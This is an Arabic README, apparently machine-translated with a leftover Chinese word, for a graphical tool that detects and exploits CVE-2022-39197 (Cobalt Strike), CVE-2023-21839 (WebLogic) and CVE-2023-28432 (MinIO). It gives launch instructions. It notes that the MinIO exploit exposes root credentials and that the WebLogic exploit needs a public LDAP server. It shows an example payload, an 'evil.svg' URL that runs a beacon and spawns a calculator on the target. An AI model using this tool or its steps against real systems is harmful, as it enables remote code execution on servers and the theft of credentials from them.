
أداة اختبار لـ CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432
أداة اختبار لثغرات CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432
أداة كشف واستغلال رسومية لهذه الثغرات الثلاث
يتطلب تشغيل jar الإصدار Java 8
موجهة لهدف واحد، غير مناسبة لفحص ثغرات متعددة العناوين IP
عند التجميع، يتطلب استغلال ثغرة Weblogic引用 wlfullclient.jar، يجب إضافته يدويًا
java -jar Gui-poc-test.jar
طريقة الاستخدام: يوجد زرين للكشف والاستغلال، مع تلميحات في واجهة الأداة حسب الثغرة
أدخل الهدف، لا حاجة لإدخال المنفذ، المنفذ الافتراضي 9000، يمكن تغييره، راجع الكود المصدري GuiDemo.java:line144
يعرض MINIO_ROOT_USER و MINIO_ROOT_PASSWORD إلخ
أدخل IP الهدف، المنفذ، وعنوان خادم LDAP
الكشف:
ملاحظة: يتطلب استغلال الثغرة إعداد خادم ldap بنفسك (عبر الإنترنت العام)
مثال للـ payload:
beacon.exe http://127.0.0.1:4444/evil.svg
النتيجة: تشغيل الحصان على ويندوز، اتصال عميل cs على mac بالخادم
في نفس الوقت، ينفذ عميل cs محتوى jar، ويتم فتح الآلة الحاسبة
تسجيل عنوان وصول cs على ويندوز
المبدأ: https://github.com/gobysec/Weblogic/blob/main/WebLogic_CVE-2023-21931_zh_CN.md
https://github.com/4ra1n/CVE-2023-21839
https://github.com/DXask88MA/Weblogic-CVE-2023-21839